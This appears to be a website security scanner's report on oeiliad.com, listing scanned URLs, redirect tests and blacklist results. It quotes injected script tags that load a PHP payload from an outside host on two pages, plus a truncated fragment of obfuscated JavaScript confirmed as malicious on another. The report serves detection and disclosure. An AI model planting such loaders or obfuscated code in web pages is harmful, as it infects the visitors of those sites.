Scanned pages/files
Request | Server response | Status |
http://www.oeiliad.com/ | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?ND | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?NA | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?MA | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?MD | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?SA | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?SD | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?DA | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/?DD | 200 OK Content-Length: 18130 Content-Type: text/html | clean |
http://www.oeiliad.com/ziwome.html | 200 OK Content-Length: 464 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://floreriaangie2.freeiz.com/cQKM7RHT.php?id=28786693"></script> | ||
http://www.oeiliad.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://www.oeiliad.com/zarah.html | 200 OK Content-Length: 13115 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var e9f76ca=true;ll1=document.layers;lll=window.sidebar;e9f76ca=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e9f76ca|=lII;yjg5B2Gd4otRlP7=new Array();yjg5B2Gd4otRlP7[0]='vc\162IA53';huI9pdwT48S2Nc9=new Array();huI9pdwT48S2Nc9[0]=' <html lang="en" id~facebook~c~ss~no_js">~ead~(scrip Antivirus reports:
| ||
http://www.oeiliad.com/wytiq.html | 200 OK Content-Length: 478 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://floreriaangie2.freeiz.com/cQKM7RHT.php?id=28786691"></script> | ||
http://www.oeiliad.com/wwrafting/ | 200 OK Content-Length: 605 Content-Type: text/html | clean |
http://www.oeiliad.com/wwrafting/?ND | 200 OK Content-Length: 605 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oeiliad.com
Result:
GET / HTTP/1.1
Host: oeiliad.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: oeiliad.com
Referer: http://www.google.com/search?q=oeiliad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oeiliad.com
Referer: http://www.google.com/search?q=oeiliad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oeiliad.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oeiliad.com/
Result: oeiliad.com is not infected or malware details are not published yet.
Result: oeiliad.com is not infected or malware details are not published yet.